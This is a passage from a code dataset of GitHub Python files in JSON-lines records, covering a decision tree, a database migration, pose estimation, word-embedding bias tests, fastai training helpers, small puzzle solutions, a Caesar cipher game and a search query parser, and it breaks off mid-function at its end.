predict(inst,tree):\n for nodes in tree.keys():\n value = inst[nodes]\n value = value.tolist()\n value = value[0]\n #print nodes\n if not is_categorical(nodes):\n ranges = Range_set(nodes)\n for i in range(len(ranges)):\n if value >= ranges[i][1] and value < ranges[i][2]:\n value = i\n #print nodes, value\n tree = tree[nodes][value]\n prediction = 0\n\n if type(tree) is dict:\n prediction = predict(inst, tree)\n else:\n prediction = tree\n break;\n\n return prediction\n\n\ndef calculate_performance(validation_data):\n TP = 0\n TN = 0\n FP = 0\n FN = 0\n\n for i in range(len(validation_data.index)):\n row = validation_data.iloc[[i]][Y]\n row = row.tolist()\n row = row[0]\n if predict(validation_data.iloc[[i]], decision_tree) == 1:\n if row == 1:\n TP += 1\n else:\n FP += 1\n else:\n if row == 0:\n TN += 1\n else:\n FN += 1\n\n accuracy = float(TP + TN) / (TP + TN + FP + FN)\n\n if TP + FP == 0:\n precision = 0\n else:\n precision = float(TP) / (TP + FP)\n\n if TP + FN == 0:\n recall = 0\n else:\n recall = float(TP) / (TP + FN)\n\n F1measure = 2.0 / ( (1/recall) + (1/precision) )\n\n print (\"accuracy =\", accuracy)\n print (\"precision =\", precision)\n print (\"recall =\", recall)\n print (\"F1 measure =\", F1measure)\n\ncalculate_performance(validation_data)\n\n\ndef predict_test(test_set, tree):\n print (\"\\nPredictions:\")\n for i in range(len(test_set.index)):\n print (predict(test_set.iloc[[i]], tree))\n\ndo_test = raw_input(\"\\nProvide test data? 
(y/n): \")\n\nif do_test == 'y' or do_test == 'Y':\n    csv_path = raw_input(\"Enter path to test CSV file: \")\n    test_set = pandas.read_csv(csv_path)\n\n    predict_test(test_set, decision_tree)\n","repo_name":"devesh-tewari/DecisionTree","sub_path":"q-1-2(method 2).py","file_name":"q-1-2(method 2).py","file_ext":"py","file_size_in_byte":9136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32239721467","text":"\"\"\"empty message\n\nRevision ID: caced45ad29b\nRevises: \nCreate Date: 2018-08-20 00:10:08.543429\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'caced45ad29b'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_table('psn_category_quick')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.create_table('psn_category_quick',\n    sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),\n    sa.Column('category_url', sa.VARCHAR(), autoincrement=False, nullable=True),\n    sa.Column('category_name', sa.VARCHAR(), autoincrement=False, nullable=True),\n    sa.Column('gameItem', postgresql.JSON(astext_type=sa.Text()), autoincrement=False, nullable=False),\n    sa.PrimaryKeyConstraint('id', name='psn_category_quick_pkey')\n    )\n    # ### end Alembic commands ###\n","repo_name":"swnoh/psn-price-tracker","sub_path":"server/migrations/versions/caced45ad29b_.py","file_name":"caced45ad29b_.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"40679182269","text":"# This file is part of to-share.\n\n# to-share is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# to-share is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with to-share. 
If not, see <http://www.gnu.org/licenses/>.\n\nimport os\nfrom os import path\nimport shutil\nimport argparse\nimport numpy as np\nimport cv2\nimport subprocess as sp\nimport detectron2\nfrom detectron2.engine import DefaultPredictor\nfrom detectron2.config import get_cfg\n\ndef get_parser():\n\tparser = argparse.ArgumentParser(description=\"\")\n\tparser.add_argument(\"--overwrite\", action=\"store_true\", help=\"Overwrite existing 2D estimations on sequence level.\")\n\treturn parser\n\n\ndef get_img_paths(imgs_dir):\n\timg_paths = []\n\tfor dirpath, dirnames, filenames in os.walk(imgs_dir):\n\t\tfor filename in [f for f in filenames if f.endswith('.png') or f.endswith('.PNG') or f.endswith('.jpg') or f.endswith('.JPG') or f.endswith('.jpeg') or f.endswith('.JPEG')]:\n\t\t\timg_paths.append(os.path.join(dirpath,filename))\n\timg_paths.sort()\n\n\treturn img_paths\n\ndef read_images(dir_path):\n\timg_paths = get_img_paths(dir_path)\n\tfor path in img_paths:\n\t\tyield cv2.imread(path)\n\n\ndef get_resolution(filename):\n    command = ['ffprobe', '-v', 'error', '-select_streams', 'v:0',\n               '-show_entries', 'stream=width,height', '-of', 'csv=p=0', filename]\n    pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=-1)\n    for line in pipe.stdout:\n        w, h = line.decode().strip().split(',')\n        return int(w), int(h)\n\n\ndef read_video(filename):\n    w, h = get_resolution(filename)\n\n    command = ['ffmpeg',\n            '-i', filename,\n            '-f', 'image2pipe',\n            '-pix_fmt', 'bgr24',\n            '-vsync', '0',\n\t\t\t'-loglevel', '16',\n            '-vcodec', 'rawvideo', '-']\n\n    pipe = sp.Popen(command, stdout=sp.PIPE, bufsize=-1)\n    while True:\n        data = pipe.stdout.read(w*h*3)\n        if not data:\n            break\n        yield np.frombuffer(data, dtype='uint8').reshape((h, w, 3))\n\n\ndef init_pose_predictor(config_path, weights_path, cuda=True):\n\tcfg = get_cfg()\n\tcfg.merge_from_file(config_path)\n\tcfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5 # set threshold for this model\n\tcfg.MODEL.WEIGHTS = weights_path\n\tif cuda == False:\n\t\tcfg.MODEL.DEVICE='cpu'\n\tpredictor = DefaultPredictor(cfg)\n\n\treturn predictor\n\n\ndef encode_for_videpose3d(boxes,keypoints,resolution, dataset_name):\n\t# Generate metadata:\n\tmetadata = {}\n\tmetadata['layout_name'] = 'coco'\n\tmetadata['num_joints'] = 17\n\tmetadata['keypoints_symmetry'] = [[1, 3, 5, 7, 9, 11, 13, 15], [2, 4, 6, 8, 10, 12, 14, 16]]\n\tmetadata['video_metadata'] = {dataset_name: resolution}\n\n\tprepared_boxes = []\n\tprepared_keypoints = []\n\tfor i in range(len(boxes)):\n\t\tif len(boxes[i]) == 0 or len(keypoints[i]) == 0:\n\t\t\t# No bbox/keypoints detected for this frame -> will be interpolated\n\t\t\tprepared_boxes.append(np.full(4, np.nan, dtype=np.float32)) # 4 bounding box coordinates\n\t\t\tprepared_keypoints.append(np.full((17, 4), np.nan, dtype=np.float32)) # 17 COCO keypoints\n\t\t\tcontinue\n\n\t\tprepared_boxes.append(boxes[i])\n\t\tprepared_keypoints.append(keypoints[i][:,:2])\n\n\tboxes = np.array(prepared_boxes, dtype=np.float32)\n\tkeypoints = np.array(prepared_keypoints, dtype=np.float32)\n\tkeypoints = keypoints[:, :, :2] # Extract (x, y)\n\n\t# Fix missing bboxes/keypoints by linear interpolation\n\tmask = ~np.isnan(boxes[:, 0])\n\tindices = np.arange(len(boxes))\n\tfor i in range(4):\n\t\tboxes[:, i] = np.interp(indices, indices[mask], boxes[mask, i])\n\tfor i in range(17):\n\t\tfor j in range(2):\n\t\t\tkeypoints[:, i, j] = np.interp(indices, indices[mask], keypoints[mask, i, j])\n\n\tprint('{} total frames processed'.format(len(boxes)))\n\tprint('{} frames were 
interpolated'.format(np.sum(~mask)))\n\tprint('----------')\n\n\treturn [{\n\t\t'start_frame': 0, # Inclusive\n\t\t'end_frame': len(keypoints), # Exclusive\n\t\t'bounding_boxes': boxes,\n\t\t'keypoints': keypoints,\n\t}], metadata\n\n\ndef predict_pose(pose_predictor, img_generator, output_path, dataset_name='detectron2'):\n\t'''\n\t\tpose_predictor: The detectron's pose predictor\n\t\timg_generator: Images source\n\t\toutput_path: The path where the result will be saved in .npz format\n\t'''\n\tboxes = []\n\tkeypoints = []\n\tresolution = None\n\n\tprint ('Predicting pose in frame:')\n\n\t# Predict poses:\n\tfor i, img in enumerate(img_generator):\n\t\tpose_output = pose_predictor(img)\n\n\t\tif len(pose_output[\"instances\"].pred_boxes.tensor) > 0:\n\t\t\tcls_boxes = pose_output[\"instances\"].pred_boxes.tensor[0].cpu().numpy()\n\t\t\tcls_keyps = pose_output[\"instances\"].pred_keypoints[0].cpu().numpy()\n\t\telse:\n\t\t\tcls_boxes = np.full((4,), np.nan, dtype=np.float32)\n\t\t\tcls_keyps = np.full((17,3), np.nan, dtype=np.float32) # nan for images that do not contain human\n\n\t\tboxes.append(cls_boxes)\n\t\tkeypoints.append(cls_keyps)\n\n\t\t# Set metadata:\n\t\tif resolution is None:\n\t\t\tresolution = {\n\t\t\t\t'w': img.shape[1],\n\t\t\t\t'h': img.shape[0],\n\t\t\t}\n\n\n\t\tprint('{} '.format(i+1), end='\\r')\n\n\t# Encode data in VidePose3d format and save it as a compressed numpy (.npz):\n\tdata, metadata = encode_for_videpose3d(boxes, keypoints, resolution, dataset_name)\n\toutput = {}\n\toutput[dataset_name] = {}\n\toutput[dataset_name]['custom'] = [data[0]['keypoints'].astype('float32')]\n\tnp.savez_compressed(output_path, positions_2d=output, metadata=metadata)\n\n\tprint ('All done!')\n\ndef run_internal_script(basedir, folder):\n\t# Predict poses and save the result:\n\tprint('Predicting 2D pose in ', basedir + '/' + folder + '/input.mp4')\n\timg_generator = read_video(basedir + '/' + folder + '/input.mp4') # or get them from a video\n\toutput_path = basedir + '/' + folder + '/pose2d'\n\tpredict_pose(pose_predictor, img_generator, output_path)\n\n\n\nif __name__ == '__main__':\n\tprint(\"==========================================================\")\n\tprint(\"to-share::detector\")\n\tprint(\"==========================================================\")\n\t# Init pose predictor:\n\n\tmodel_config_path = 'detectron2/configs/COCO-Keypoints/keypoint_rcnn_X_101_32x8d_FPN_3x.yaml'\n\tmodel_weights_path = 'detectron2://COCO-Keypoints/keypoint_rcnn_X_101_32x8d_FPN_3x/139686956/model_final_5ad38f.pkl'\n\n\tpose_predictor = init_pose_predictor(model_config_path, model_weights_path, cuda=True)\n\n\targs = get_parser().parse_args()\n\n\tbasedir = '../data/train/video/deep-dance'\n\tfor video_folder in os.listdir(basedir):\n\t\tif os.path.isdir(basedir + '/' + video_folder):\n\t\t\tprint('\\n')\n\t\t\tprint('Predicting 2D poses for videos in folder \\\"' + video_folder + '\\\"...')\n\t\t\tprint(\"----------------------------------------------------------\")\n\t\t\tfor folder in os.listdir(basedir + '/' + video_folder):\n\t\t\t\tpose2d_numpy = basedir + '/' + video_folder + '/' + folder + '/pose2d.npz'\n\t\t\t\tif path.isfile(pose2d_numpy):\n\t\t\t\t\tprint(\"2D pose estimation export (numpy) found.\")\n\t\t\t\t\tif args.overwrite:\n\t\t\t\t\t\tprint(\"Flag detected. 
Overwriting...\")\n\t\t\t\t\t\trun_internal_script(basedir, video_folder + '/' + folder)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Skipping.\")\n\t\t\t\telse:\n\t\t\t\t\trun_internal_script(basedir, video_folder +'/' + folder)\n","repo_name":"deep-dance/core","sub_path":"detector/predict_2d_pose.py","file_name":"predict_2d_pose.py","file_ext":"py","file_size_in_byte":7382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"23557620161","text":"#Python 3.6\r\n#Jeremiah Gastilo\r\n\r\nt = int(input()) # read a line with a single integer\r\nfor i in range(1, t + 1):\r\n    n = input() # read a list of integers, 2 in this case\r\n    for x in range(1, len(n)):\r\n        if n[-x] < n[-(x+1)]:\r\n            n = str(int(n)-(int(n[-x:])+1))\r\n    print(\"Case #{}: {}\".format(i, n))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3112.py","file_name":"3112.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34665361782","text":"# Jelle Bosscher - UvA 2020\n# jellebosscher@gmail.com\n\n# utils for POAT/WEAT\nfrom pos_op_weat import *\nfrom pos_op import *\n\ndef weat_iat_pos_op(data, X, Y, A, B, iterations=100000, POAT=True, measure=K_E):\n    \"\"\"\n    Runs the POAT (or WEAT) on one experiment.\n    Input: data - POAT=True: positive operators (NxN np.array),\n                  POAT=False: word vectors (Nx1 np.array)\n           X, Y, A, B - two sets of target words and two sets of attribute words.\n           iterations - amount of iterations to estimate the likelihood of the effect_size\n           POAT=True - use positive operators (POAT) or word embeddings (WEAT),\n           measure - applies to positive operators only, define measure of graded hyponymy\n    \"\"\"\n    dist = nullDistribution(data, X, Y, A, B, iterations, POAT, measure)\n    test_stat, effect_size = diff_weat_ass_K_E(data, X, Y, A, B, measure)\n    pvalue = calc_cumulative_prob(dist, test_stat)\n\n    print(\"#{}\".format(\"-\"*75))\n    print(f\"{'|':>37} effect_size: {effect_size}\\r| test_stat: {test_stat}\")\n    print(f\"{'|':>37} exponent: {np.floor(np.log10(np.abs(pvalue))+1.)}\\r| pvalue: {pvalue}\")\n    print(\"#{}\".format(\"-\"*75))\n    print()\n    return dist, test_stat, effect_size, pvalue\n\ndef load_embeddings(filename):\n    \"\"\"\n    Import embeddings from a text file line by line. 
Store the vector for each word in a dictionary.\n    \"\"\"\n    embeddings = dict()\n    print(\"Loading embeddings...\")\n    with open(filename, 'r', encoding=\"utf-8\") as f:\n        for line in f:\n            values = line.split()\n            word = values[0]\n            if word == '.':\n                continue\n            try:\n                vector = np.asarray(values[1:], \"float32\")\n            except ValueError:\n                continue  # skip malformed lines instead of storing the previous word's vector\n            embeddings[word] = vector\n    print(\"Done\\n\")\n    return embeddings\n\ndef construct_model(embeddings, directory, POAT=True):\n    \"\"\"\n    Read all words from every experiment file and build the model using only those words.\n    Input: embeddings, directory, POAT (dict, path_to_folder, boolean (POAT vs WEAT))\n    \"\"\"\n    input_words = []\n    for filename in os.listdir(directory):\n        with open(directory + filename, 'r') as f:\n            for line in f:\n                input_words.append(line.strip().split(', '))\n    all_words = set([x for test in input_words for x in test[1:]])\n\n    print(\"Constructing model: pos_op or vec...\")\n\n    data = dict()\n\n    for word in all_words:\n        if POAT:\n            data[word] = pos_op(embeddings, word)\n        else:\n            data[word] = embeddings[word]\n\n    print(\"Done\\n\")\n    return data\n","repo_name":"jellebosscher/POAT","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"8995415389","text":"from logger import logger\nimport numpy as np\nimport torch\nfrom fastai.callbacks import TrainingPhase, GeneralScheduler, SaveModelCallback, EarlyStoppingCallback\n\n\ndef sigmoid(x):\n    return 1 / (1 + np.exp(-x))\n\n\ndef save_model_without_embedding(model, model_name):\n    logger.info(\"saving model in {}\".format(model_name))\n    temp_dict = model.state_dict()\n    del temp_dict['embedding.weight']\n    torch.save(temp_dict, model_name)\n\n\ndef moving_average(net1, net2, alpha=1):\n    for param1, param2 in zip(net1.parameters(), net2.parameters()):\n        param1.data *= (1.0 - alpha)\n        param1.data += param2.data * alpha\n\n\ndef predict(test, learner, batch_size, output_dim):\n    learner.model.eval()\n    with torch.no_grad():\n        test_loader = torch.utils.data.DataLoader(test, batch_size=batch_size, shuffle=False)\n        test_preds = np.zeros((len(test), output_dim))\n        for i, x_batch in enumerate(test_loader):\n            x = x_batch[0].cuda()\n            x_features = x_batch[1].cuda()\n            y_pred = sigmoid(learner.model(x, x_features).detach().cpu().numpy())\n            test_preds[i * batch_size:(i+1) * batch_size, :] = y_pred\n    return test_preds\n\n\ndef predict_with_model(test, model, batch_size, output_dim):\n    model.eval()\n    with torch.no_grad():\n        test_loader = torch.utils.data.DataLoader(test, batch_size=batch_size, shuffle=False)\n        test_preds = np.zeros((len(test), output_dim))\n        for i, x_batch in enumerate(test_loader):\n            x = x_batch[0]\n            x_features = x_batch[1]\n            y_pred = sigmoid(model(x, x_features).detach().cpu().numpy())\n            test_preds[i * batch_size:(i+1) * batch_size, :] = y_pred\n    return test_preds\n\n\ndef train_model(learn, lr=0.001, lr_decay=0.8, batch_size=512, n_epochs=20, model_name='fastai_'):\n    n = len(learn.data.train_dl)\n    phases = [(TrainingPhase(n).schedule_hp('lr', lr * (lr_decay ** (i)))) for i in range(n_epochs)]\n    sched = GeneralScheduler(learn, phases)\n    learn.callbacks.append(sched)\n\n    learn.fit(n_epochs,\n              callbacks=[SaveModelCallback(learn, name=model_name),\n                         EarlyStoppingCallback(learn, min_delta=0.001, patience=5)])\n\n\ndef train_model_per_epoch(learn, test, output_dim, model_idx, lr=0.001, lr_decay=0.6, batch_size=512, n_epochs=20,\n                          early_stopping=5, 
save_models='all', model_name='fastai_'):\n all_test_preds = []\n best_loss = -1\n best_epoch = 1\n for epoch in range(n_epochs):\n\n learn.fit(1, lr=lr * (lr_decay ** epoch))\n\n current_val_loss = learn.recorder.val_losses[0]\n test_preds = predict(test, learn, batch_size=256, output_dim=output_dim)\n all_test_preds.append(test_preds)\n if save_models == 'all':\n save_model_without_embedding(learn.model, model_name + str(model_idx * n_epochs + epoch) + \".pt\")\n if best_loss == -1 or current_val_loss < best_loss:\n best_epoch = epoch\n best_loss = current_val_loss\n else:\n if epoch - best_epoch == early_stopping:\n break\n\n logger.info(\"best epoch: {}, best loss: {:4.5f}\".format(best_epoch, best_loss))\n\n if save_models == 'last':\n save_model_without_embedding(learn.model, model_name + str(model_idx * n_epochs + epoch) + \".pt\")\n return all_test_preds\n","repo_name":"nyounes/kaggle","sub_path":"jigsaw/model_tools.py","file_name":"model_tools.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35863008901","text":"class Solution:\n def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n total = 0\n\n for (boxes, items) in sorted(boxTypes, key=lambda bt: bt[1], reverse=True):\n total += items * min(boxes, truckSize)\n truckSize -= min(boxes, truckSize)\n\n if truckSize == 0:\n break\n\n return total\n","repo_name":"pbelskiy/contest","sub_path":"leetcode.com/1710_maximum_units_on_a_truck/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16762080294","text":"# NOTE - My Caesar Cipher\n# To encode user's message, shift right n positions in the alphabet, looping around\n# To decode user's message, shift left n positions in the alphabet, looping around\n# I'll challenge myself to use a single alphabet list\n\nimport os\nimport caesar_art\n\n\n# Set up our alphabet list.\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n\n# Initialize the game with title screen\ndef gamestart():\n os.system('clear')\n print(caesar_art.logo)\n print()\n\n\ndef userinput():\n input_choice = \"\"\n while input_choice != \"E\" and input_choice != \"D\":\n input_choice = input(\"Would you like to [E]ncode or [D]ecode your message? 
\")\n    input_message = input(\"Please enter the message: \\n\")\n    input_shift = input(\"Please enter the shift amount: \")\n    return input_choice, input_message, input_shift\n\n\ndef cipher():\n    continue_game = True\n    while continue_game:\n        choice, message, shift = userinput()\n\n        final_text = \"\"\n        for character in message:\n            is_alpha = character.isalpha()\n            is_upper = character.isupper()\n            character = character.lower()\n            char_shift = int(shift)\n            if not is_alpha:\n                final_text += character\n            elif choice == \"E\":\n                position = alphabet.index(character)\n                if position + char_shift > 25:\n                    char_shift = (position + char_shift) % 26\n                    translation = alphabet[0 + char_shift]\n                else:\n                    translation = alphabet[position + char_shift]\n\n                if is_upper:\n                    final_text += translation.upper()\n                else:\n                    final_text += translation\n            else:\n                position = alphabet.index(character)\n                if position - char_shift < 0:\n                    char_shift = (char_shift - position) % 26\n                    translation = alphabet[(26 - char_shift) % 26]  # extra % 26 avoids an IndexError when the effective shift is a multiple of 26\n                else:\n                    translation = alphabet[position - char_shift]\n\n                if is_upper:\n                    final_text += translation.upper()\n                else:\n                    final_text += translation\n\n        if choice == \"E\":\n            print(\"Your encoded message is:\")\n            print(final_text)\n        else:\n            print(\"Your decoded message is:\")\n            print(final_text)\n\n        game_on = input(\"Would you like to try another message? [Y] or [N]: \\n\")\n        if game_on == \"N\":\n            continue_game = False\n\n        os.system('clear')\n\n\ngamestart()\ncipher()\n","repo_name":"rlane728/100DaysOfPython","sub_path":"Day08/Caesar_Cipher.py","file_name":"Caesar_Cipher.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70511511556","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"Escriba una función es_bisiesto() que determine si un año determinado es un año bisiesto. \nUn año bisiesto es divisible por 4, pero no por 100. También es divisible por 400.\ndef es_bisiesto(year):\n    return year % 4 == 0 and ( year % 100 != 0 or year % 400 == 0)\n\"\"\"\n\n\"\"\"\nEscribe un programa que pida dos palabras y diga si riman o no. Si coinciden las tres últimas letras tiene que \n# decir que riman. 
Si coinciden sólo las dos últimas tiene que decir que riman un poco y si no, que no riman.\n\"\"\"\n\ndef son_rimas(palabra_1, palabra_2):\n ultimas_3_palabra_1 = palabra_1[-3:]\n ultimas_3_palabra_2 = palabra_2[-3:]\n ultimas_2_palabra_1 = palabra_1[-2:]\n ultimas_2_palabra_2 = palabra_2[-2:]\n\n\n if ultimas_3_palabra_1 == ultimas_3_palabra_2:\n print(\"Riman\")\n elif ultimas_2_palabra_1 == ultimas_2_palabra_2:\n print(\"Riman un poco\")\n else:\n print(\"No riman\")\n\ndef validar_palabra():\n valido = True\n while valido == True:\n palabra_1 = input(\"Ingrese una palabra: \")\n if len(palabra_1) > 3:\n valido = False\n return palabra_1 \n\npalabra_1 = validar_palabra()\npalabra_2 = validar_palabra()\n\nson_rimas(palabra_1, palabra_2)\n\n\n\"\"\"\nEscribe una función llamada \"elimina_duplicados\"\nque elimine los elementos duplicados en una lista y los devuelva en una nueva lista.\n\"\"\"","repo_name":"parivgabriela/tec_sup_ciencia_datos_ia","sub_path":"tec_programacion/ejercicios_clase/clase05-30.py","file_name":"clase05-30.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1295594363","text":"import sys\nimport os\nimport glob\nimport re\nimport time\nimport numpy as np\nimport heapq\n\nfrom nltk.corpus import stopwords\nimport Stemmer\n\nfrom index import DOC_BLOCK_SIZE\n\nNUM_RESULTS = [100, 10]\nTOT_DOCS = 50000000\n\n# For storing docs and tfs, given query\nclass QDoc():\n def __init__(self, doc_id, is_field_query, num_words=-1):\n self.doc_id = doc_id\n self.is_field_query = is_field_query\n self.terms = []\n # Term format { 'token', 'tf', 'fields', 'posting_list_size' }\n self.num_words = num_words\n \n # Add a query word in the document\n def addQuerryWord(self, token, tf, fields, pl_size):\n term = [token, tf, fields, pl_size]\n self.terms.append(term)\n \n # Calculate the TF-IDF score for the document\n def calculateScore(self, field_weights):\n score = 0\n # print(self.terms)\n for term in self.terms:\n pl_size = term[3]\n idf = np.log(TOT_DOCS/pl_size)\n fields = term[2]\n \n # Add Body frequency\n tf = 0\n if self.is_field_query:\n if 'b' in fields:\n tf = int(term[1])\n else:\n tf = int(term[1])\n \n # Add frequency for other fields (t, i, c, l, r)\n for field in fields:\n field = field+':'\n tf += field_weights[field]\n # For the 100 docs, divide tf by num_words\n # (to improve the relevance by penalizing long docs)\n if self.num_words != -1:\n tf /= self.num_words\n\n score += idf * tf\n \n score = np.log(score)\n return score\n\nclass QueryParser():\n def __init__(self, argv):\n # Location of the query file\n self.query_file = argv[0]\n \n # Directory path for the index files\n self.index_path = './index/'\n # Directory path for the doc-title files\n self.doc_path = './doc/'\n # Directory for secondary index\n self.sec_dir = './secondary/'\n # Filename for secondary file index\n self.sec_file_path = os.path.join(self.sec_dir, 'secondary.txt')\n \n # Query results file\n self.query_results_file = os.path.join('./queries_op.txt')\n if os.path.exists(self.query_results_file):\n os.remove(self.query_results_file)\n \n # stemmer\n self.stemmer = Stemmer.Stemmer('english')\n # stopwords\n self.stopwords = set(stopwords.words('english'))\n\n self.fields = ['t:','b:','i:','c:','l:','r:']\n\n self.field_weights = {\n 't:': 100,\n 'b:': 1,\n 'i:': 40,\n 'c:': 40,\n 'l:': 10,\n 'r:': 10\n }\n\n # REGEX\n self.categories_regex = re.compile(r\"\\[\\[category:(.*)\\]\\]\")\n 
self.external_regex = re.compile(r\"=+external links=+\")\n self.infobox_regex = re.compile(r\"{{infobox((.|\\n)*)}}\\n\")\n self.links_regex = re.compile(r\"(https?://\\S+)\")\n self.references_regex = re.compile(r\"\\{\\{cite(.*?)\\}\\}\")\n self.token_regex = re.compile(r\"[^a-z0-9]+\")\n self.field_regex = re.compile(r\"([tbiclr]:)\")\n self.ignore_regex = [\n # Alphanumeric\n re.compile(\n r\"\\b((\\w*[0-9]\\w*)(\\w*[a-z]\\w*))|((\\w*[a-z]\\w*)(\\w*[0-9]\\w*))\\b\"),\n # Numbers <= 3 digits\n re.compile(r\"\\b[0-9]{1,3}\\b\"),\n # Numbers 4 digits, greater than 2022, less than 1000\n re.compile(r\"\\b(?:0(?:[0-9]{3})|20[3-9][0-9]|202[3-9]|[3-9][0-9]{3})\\b\"),\n # Numbers >= 5 digits\n re.compile(r\"\\b[0-9]{5,}\\b\"),\n # Letters = 1 char\n re.compile(r\"\\b[a-z]{1}\\b\"),\n # Letters >= 15 chars\n re.compile(r\"\\b[a-z]{15,}\\b\")\n ]\n\n self.is_field_query = False\n self.doc_count = 0\n self.docs = []\n self.doc_titles = []\n self.pl = {}\n\n # Parse Queries in the query file\n def parse_queries(self):\n self.queries = []\n with open(self.query_file, 'r') as f:\n queries = f.readlines()\n for query in queries:\n self.queries.append(query[:-1].lower())\n\n # Remove stopwords and/or perform stemming\n def tokenizer(self, text, remove_stopwords=True, do_stemming=True):\n text = set(text)\n\n if remove_stopwords is True:\n text = text - self.stopwords\n \n tokens = []\n for tok in text:\n if do_stemming is not True:\n tokens.append(tok)\n continue\n elif self.links_regex.match(tok):\n tokens.append(tok)\n continue\n\n # Cleaning\n # token = str(self.lemmatizer.lemmatize(tok))\n token = str(self.stemmer.stemWord(tok))\n to_continue=False\n for ig in self.ignore_regex:\n if ig.match(token):\n to_continue=True\n if to_continue is True:\n continue\n tokens.append(token)\n\n return tokens\n\n # Retrieve the index file name from secondary index\n def getIndexFileName(self, token_list):\n n = len(token_list)\n tokens_found = 0\n with open(self.sec_file_path, 'r') as f:\n line = f.readline()\n prev_filename, prev_token = line[:-1].split(';')\n line = f.readline()\n if line == '':\n for tok in token_list:\n token_list[tok] = prev_filename\n tokens_found = n\n else:\n while line != '' and tokens_found < n:\n cur_filename, cur_token = line[:-1].split(';')\n for tok in token_list:\n if prev_token<=tok and cur_token>tok and token_list[tok]=='':\n token_list[tok] = prev_filename\n tokens_found += 1\n prev_filename, prev_token = cur_filename, cur_token\n line = f.readline()\n for tok in token_list:\n if token_list[tok]=='':\n tokens_found += 1\n token_list[tok] = prev_filename\n \n return token_list\n\n # Find the set of documents in posting list\n # and their corresponding term freq.\n def findDocumentSet(self):\n self.doc_set = set()\n self.doc_id_set = set()\n for tok, pl in self.pl.items():\n terms = pl.split(';')\n pl_size = len(terms[1:])\n for term in terms[1:]:\n doc_id, tf, fields = term.split(':')\n if self.is_field_query is True:\n fields = self.token_queries[tok]\n if doc_id in self.doc_id_set:\n doc = next(filter(lambda x: x.doc_id == doc_id, self.doc_set))\n doc.addQuerryWord(tok, tf, fields, pl_size)\n else:\n doc = QDoc(doc_id, self.is_field_query)\n doc.addQuerryWord(tok, tf, fields, pl_size)\n self.doc_set.add(doc)\n self.doc_id_set.add(doc_id)\n\n def addWordCount(self):\n # Reduce the set of documents to the top NUM_RESULTS[0] = 100\n top_doc_set = set()\n for doc_id in self.docs:\n doc = next(filter(lambda x: x.doc_id == doc_id, self.doc_set))\n top_doc_set.add(doc)\n 
self.doc_set = top_doc_set\n \n # Now retrieve the num_words for each doc\n itr = 0\n while itr < len(self.docs):\n doc_id = self.docs[itr]\n doc_file = self.findDocFile(doc_id)\n doc_file_name = os.path.join(self.doc_path, doc_file)\n curr_doc_file = doc_file\n\n with open(doc_file_name, 'r') as f:\n line = f.readline()\n while line != '':\n terms = line[:-1].split(';')\n id = terms[0]\n if id == doc_id:\n doc = next(filter(lambda x: x.doc_id == doc_id, self.doc_set))\n wc = int(terms[1])\n doc.num_words = wc\n\n # Get info of next doc\n itr += 1\n if itr >= len(self.docs):\n break\n # Break if need to read diff. file (self.docs is sorted)\n doc_id = self.docs[itr]\n doc_file = self.findDocFile(doc_id)\n doc_file_name = os.path.join(self.doc_path, doc_file)\n if doc_file != curr_doc_file:\n break\n \n line = f.readline()\n \n if itr >= len(self.docs):\n break\n\n # Retrieve NUM_RESULTS[level=>0/1] most relevant documents\n # based in their score\n def ranker(self, level):\n heap = []\n self.docs = []\n for doc in self.doc_set:\n score = doc.calculateScore(self.field_weights)\n heap.append([score, doc.doc_id])\n heapq._heapify_max(heap)\n \n # Get the top NUM_RESULTS[level] results\n while len(heap)>0 and len(self.docs) query field\n self.token_queries = {}\n # Stores the index file name of each token\n token_list = {}\n for key in format_data:\n if len(format_data[key]) != 0:\n toks = self.tokenizer(format_data[key])\n for tok in toks:\n token_list[tok] = ''\n if tok in self.token_queries:\n self.token_queries[tok]+=key\n 